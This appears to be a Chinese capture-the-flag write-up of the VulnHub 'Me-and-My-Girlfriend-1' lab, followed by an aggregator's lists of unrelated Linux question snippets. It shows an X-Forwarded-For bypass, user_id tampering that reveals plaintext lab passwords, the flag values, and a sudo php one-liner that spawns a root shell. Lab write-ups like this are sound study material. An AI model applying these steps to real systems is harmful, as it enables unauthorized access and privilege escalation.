VulnHub--Me-and-My-Girlfriend-1

2023-10-30

背景

有两个恋人，即Alice和Bob，这对夫妻本来很浪漫，但是自从Alice在一家私人公司“Ceban Corp”工作以来，爱丽丝对鲍勃的态度发生了一些变化是“隐藏”的，而鲍勃（Bob）寻求您的帮助，以获取爱丽丝（Alice）隐藏的内容并获得对该公司的完全访问权限！

需求

Me-and-My-Girlfriend-1 虚拟机
Kali Linux 2021

复现

在这里插入图片描述
调一下kali 设置 root权限

这个是mygirlfrienf 的net 网段在192.168.227.0

Kali的网段也是在192.168.227.0

一共有五个

看下kali的ip地址 192.168.227.128
本机的ip 192.168.227.1

最后找的girlfriend 的IP为192.168.227.133

在这里插入图片描述
这里显示让我们本地登录

使用firfox的X-ForWarded插件

在这里插入图片描述
在url修改id=xx
http://192.168.227.133/index.php?page=profile&user_id=1
Name Eweuh Tandingan
Username eweuhtandingan
Password skuyatuh
Id=2
Name Aing Maung
Username aingmaung
Password qwerty!!!
Id=3
Name Sunda Tea
Username sundatea
Password indONEsia
Id=4
Name Sedih Aing Mah
Username sedihaingmah
Password cedihhihihi
Id=5
Name Alice Geulis
Username alice
Password ic3
Id=6
Name
Username
Password
Id=7
Name
Username
Password
Id=8
Name
Username
Password
Id=9
Name Abdi Kasep
Username abdikasepak
Password orrrrr
Id=10
Name
Username
Password
Id=11
Name
Username
Password
Id=5 这个应该是ssh连接的账号和密码，根据靶场介绍我们应该要找一个叫做alice的用户
Ssh alice@192.168.227.133 密码 4lic3

在这里插入图片描述
ls -alh

ls -l .my_secret/

cat .my_secret/flag1.txt
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
那接下来就提权吧
查看一下当前用户的sudo能使用那些命令

能用root执行php命令。
sudo php -r “system(‘bash’);”
whoami
Cat flag2.txt
在这里插入图片描述
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

VulnHub靶场

Linux

VulnHub--Me-and-My-Girlfriend-1 的相关文章

如何获取 linux 实用程序 tail 的源代码？

这个命令确实非常有用但是我可以在哪里获取源代码以查看内部发生的情况 thanks tail 实用程序是 Linux 上 coreutils 的一部分源压缩包 ftp ftp gnu org gnu coreutils coreutils
gethostbyname() 或 getnameinfo() 如何在后台工作？

How gethostbyname or getnameinfo 在后台工作 include
gentoo crontab：为什么这个简单的 crontab 不起作用？

我使用 GENTOO 发行版 crontab e 35 12 root php5 home www cron php 当我手动运行时 php5 php5 home www cron php 这有效它向我发送了一封电子邮件然后我检查日期
git在Windows和Linux之间切换后强制刷新索引

我有一个Windows和Linux共享的磁盘分区格式 NTFS 它包含一个 git 存储库约 6 7 GB 如果我只使用Windows or 只使用Linux操作 git 存储库一切正常但是每次切换系统的时候git status命令将
停止服务时单元陷入故障状态（状态=143）[关闭]

Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案这是我的问题我有 CentOS 和 java 进程在上面运行 Java进程是通过启动停止脚本来操作的它也创建了 java 实例的 p
在 LINUX 上使用 Python 连接到 OLAP 多维数据集

我知道如何在 Windows 上使用 Python 连接到 MS OLAP 多维数据集嗯至少有一种方法通常我使用 win32py 包并调用 COM 对象进行连接 import win32com client connection wi
无法安装 WWW::Curl::Easy: SZBALINT/WWW-Curl-4.17.tar.gz : make NO

我正在尝试在我的 Fedora 26 机器上安装 WWW Curl Easy gcc c I usr include D REENTRANT D GNU SOURCE O2 g pipe Wall Werror format securit
标准头文件中的 C 编译器错误 - 未定义的 C++ 定义

我正在尝试编译 C 程序但收到许多错误这些错误是在标准 C 头文件 inttypes h stdio h stat h 等中遇到的错误的来源是以下未定义的常量 BEGIN DECLS END DECLS BEGIN NAMESPAC
linux x86 汇编语言 sys_read 调用的第一个参数应为 0 (stdin)

我正在编写一个简单的汇编程序来从标准输入读取如 scanf 这是我的代码 section bss num resb 5 section txt global start start mov eax 3 sys read mov ebx 0
如何让“grep”从文件中读取模式？

假设有一个很大的文本文件我只想打印与某些模式不匹配的行显然我可以使用egrep v patter1 pattern2 pattern3 现在如果所有这些模式都在一个文本文件中怎么办最好的制作方法是什么egrep从文件中读取模式 g
劫持系统调用

我正在编写一个内核模块我需要劫持包装一些系统调用我正在暴力破解 sys call table 地址并使用 cr0 来禁用启用页面保护到目前为止一切顺利一旦完成我将公开整个代码因此如果有人愿意我可以更新这个问题无论如何
Linux shell 脚本中的 while 循环超时

这工作正常无限循环 while TRUE do printf done 我在尝试着timeout this while loop与timeout命令所有这些都不起作用 timeout 5 while TRUE do printf don
归档文件系统或格式

我正在寻找一种文件类型来存储已退役系统的档案目前我们主要使用 tar gz 但从 200GB tar gz 存档中查找并提取几个文件是很麻烦的因为 tar gz 不支持任何类型的随机访问读取规定在你明白之前使用 FUSE 安装 t
如何使用 sed 仅删除双空行？

我找到了这个问题和答案 https stackoverflow com questions 4651591 howto use sed to remove only triple empty lines关于如何删除三重空行但是我只需要对
在 Linux 上的 Python 中使用受密码保护的 Excel 工作表

问题很简单我每周都会收到一堆受密码保护的 Excel 文件我必须解析它们并使用 Python 将某些部分写入新文件我得到了文件的密码当在 Windows 上完成此操作时处理起来很简单我只需导入 win32com 并使用 clie
PHP 致命错误：未找到“MongoClient”类

我有一个使用 Apache 的网站代码如下当我尝试访问它时我在 error log 中收到错误 PHP Fatal Error Class MongoClient not found 以下是可能错误的设置但我认为没有错误 php i
并行运行 make 时出错

考虑以下制作 all a b a echo a exit 1 b echo b start sleep 1 echo b end 当运行它时make j2我收到以下输出 echo a echo b start a exit 1 b star
为什么我收到的数据包数据大小大于mss？

我在两台 PC 上使用 ifconfig ethX mtu 300 修改了 MTU 并使用 netperf 测试网络我用 WireShark 嗅探了 SYN 数据包中的 MSS 260 但我得到了一些大于 260 的数据包为什么嗅探器
何时使用 pthread 条件变量？

线程问题看来只有在其他线程调用 pthread cond notify 之前调用 pthread cond wait 时条件变量才起作用如果在等待之前发生通知那么等待将被卡住我的问题是什么时候应该使用条件变量调度程序可以抢占
Android：ANT 构建失败，并显示 google-play-services-lib：“解析为没有项目的 project.properties 文件的路径”

我正在尝试使用 ANT 构建我的应用程序但在包含 google play services lib 库项目后我惨遭失败 Step 1 我在 project properties 文件中设置了对库项目的引用 android library

随机推荐

vs 自定义格式化代码快捷键

vs 自定义格式化代码快捷键工具选项环境键盘编辑设置选定内容的格式全局输入自己想要的快捷键分配确定
sysdba不能远程登录

sysdba不能远程登录这个也是一个很常见的问题了碰到这样的问题我们该如何解决呢我们用sysdba登录的时候用来管理我们的数据库实例特别是有时候服务器不再本台机器这个就更是有必要了当我们用sqlplus as sysdba 是
怎么利用数据库做分布式共享锁

一适用环境 1 数据库集群模式 1主多从 2 单机数据库 3 数据库必须提供行级锁功能二原理 cas算法代码更新当前值为new updateCurrentValue id new old old 通过id 查到的值 new 期望的
变量交换的四种方式

可以使用以下方法对两个变量进行交换方法一定义一个中间量 define CRT SECURE NO WARNINGS include
VUE 项目文件夹上传下载解决方案

原理 js将大文件分成多分全部上传成功之后调用合并接口合成文件如果传输中断下次上传的时候过滤掉已经上传成功的分片将剩余的分片上传成功之后合并文件前置条件获取uoloadId接口用于标记分片分片上传接口合成文件接口后端
matplotlib画图间隔范围等设置

import matplotlib pyplot as plt from matplotlib pyplot import MultipleLocator 从pyplot导入MultipleLocator类这个类用于设置刻度间隔 x va
Burpsuite教程(一)Burpsuite 火狐谷歌浏览器抓包教程

文章目录 Web抓包火狐抓包谷歌抓包小技巧结束 Web抓包火狐抓包环境需求火狐浏览器代理插件 1 打开测试工具BurpSuite 默认工具拦截功能是开启的颜色较深我们点击取消拦截下图取消拦截状态数据包可以自由通过 2
vue3.0中全局注册组件版本1-官方

前言在对vue3 0的使用和学习中发现了很多和以前不一样的方法这里聊一聊vue3 0中给我们提供的全局的注册组件方法官方文档入口目录具体方法介绍 1 前提返回一个提供应用上下文的应用实例应用实例挂载的整个组件树共享同一个上
iOS字典转成JSON换行符问题

问题使用系统框架将字典转成压缩转义后的JSON字符串发现字符串中带有多个换行符系统转JSON的方法如下 let json try JSONSerialization jsonObject with validData options
嵌入式开发笔记—关于＞＞和＜＜、&和&&和指针

1 gt gt 和 lt lt 符号 gt gt 可以理解为除以2的几次方例如a gt gt b相当于a除以2 b 相反符号 lt lt 可以理解为乘2的几次方上面描述的只是它们的数字意义实际上 gt gt 为右移运算符其运算规则
架构师之我见

架构师是一个项目组的灵魂人物他决定着整个系统的技术选型整体架构以及模块划分同时还可能担当与领导层的沟通角色从某种意义上来说架构师在很大程度上决定着项目的成败与否正所谓火车跑得快全靠车头带很多优秀的架构师都是从一个优秀的开发人
C模拟C++静态断言

百度百科 C 11新特性静态断言 Static assertions Static assert 在解释 if 和 error 之后被处理简单的说就是检测代码不可能事件的发生如果真的发生了在编译期间编译器会报错表示代码的逻辑存
vector数组最大、小值及所在坐标

在普通数组中例 a 1 2 3 4 5 6 int maxValue max element a a 6 最大值 int minValue min element a a 6 最小值 int maxPosition max element
学创客机器人编程材料费贵吗_创客教育只是学编程、机器人和3D打印?

创客 Mak er 创指创造客指从事某种活动的人创客本指勇于创新努力将自己的创意变为现实的人这个词译自英文单词 Mak er 源于美国麻省理工学院微观装配实验室的实验课题此课题以创新为理念以客户为中心以个人设计个人制造
cavans 详解

Canvas Color Styles Shadows 属性 fillStyle 设置或者返回填充的颜色渐进色 strokeStyle 设置或者返回描边的颜色渐进色 shadowColor 设置或者返回shadows的颜色 shadow
KEIL MDK中 warning: #223-D: function "xxx" declared implicitly 解决方法

今天在EINT的范例里添加了一个函数即eint c中添加了一个datawrite 的函数并在主函数main c中调用编译便警告 warning 223 D function datawrite declared implicitly
详解Shiro认证流程

详解Shiro认证流程 isAccessAllowed Subject在如何得到 resolveSession doCreateSubject save Subject subject isAuthenticated onAccessDen
EditText TextWatch监听简单使用

TextWatch 接口方法如下方法执行顺序 beforeTextChanged gt onTextChanged gt afterTextChanged new TextWatcher This method is called to
vue 用户列表，请求接口中数据并渲染页面，分页

参考 vue电商项目实战哔哩哔哩 bilibili 用户列表渲染数据一般数据 1 接口请求数据格式 get方式传入参数 page rows 2 初始化定义变量 3 联调接口 1 created 2 methods 发送请求 3 接口
VulnHub--Me-and-My-Girlfriend-1

背景有两个恋人即Alice和Bob 这对夫妻本来很浪漫但是自从Alice在一家私人公司 Ceban Corp 工作以来爱丽丝对鲍勃的态度发生了一些变化是隐藏的而鲍勃 Bob 寻求您的帮助以获取爱丽丝 Alice 隐藏的内容并

VulnHub--Me-and-My-Girlfriend-1

背景

需求

复现

VulnHub--Me-and-My-Girlfriend-1 的相关文章

随机推荐

热门标签